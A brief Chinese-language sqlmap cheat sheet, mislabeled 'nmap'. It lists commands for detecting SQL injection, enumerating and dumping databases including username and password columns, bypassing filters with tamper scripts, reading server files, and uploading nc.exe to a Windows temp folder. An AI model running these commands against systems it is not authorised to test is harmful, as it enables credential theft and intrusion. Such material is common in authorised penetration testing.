nmap

 

查询是否存在注入	sqlmap.py -u url
检测多个url	sqlmap -m target.txt
查询当前用户下的所有数据库	sqlmap.py -u url --dbs
dkeye数据库中的列表名	-D dkeye --tables
查询字段名	-D dkeye -T user --columns
查看具体的字段信息	-D dkeye -T user -C username,password --dump
列出数据库的用户(存在读取权限)	--users
查询数据库的密码	--passwords
获取当前数据库	--current-db
获取当前登录数据库使用的用户	--current-user
查看当前账户是否为数据库管理员账户	--is-dba
从文件中加载HTTP请求	sqlmap.py -r desktop/1.txt
从数据库服务器中读取文件	sqlmap.py -u url \ --file-read "File-Path" -v 1
Cookie注入	--cookie=" Cookie内容"
自动获取表单	--forms
自定义user-agent	--user-agent " "
使用referer欺骗	--referer "  "
POST方式提交数据	--method "POST" --data "page=1&id=2"
绕过	--tamper xx.py,cc.py
指定代理	--proxy="   "
在kali中将home/nc.exe上传到C:/windows/Temp下	sqlmap.py -u url --file-write="/home/nc.exe" --file-dest="C:/windows/Temp
从数据库文件系统读取文件	--file-read="    "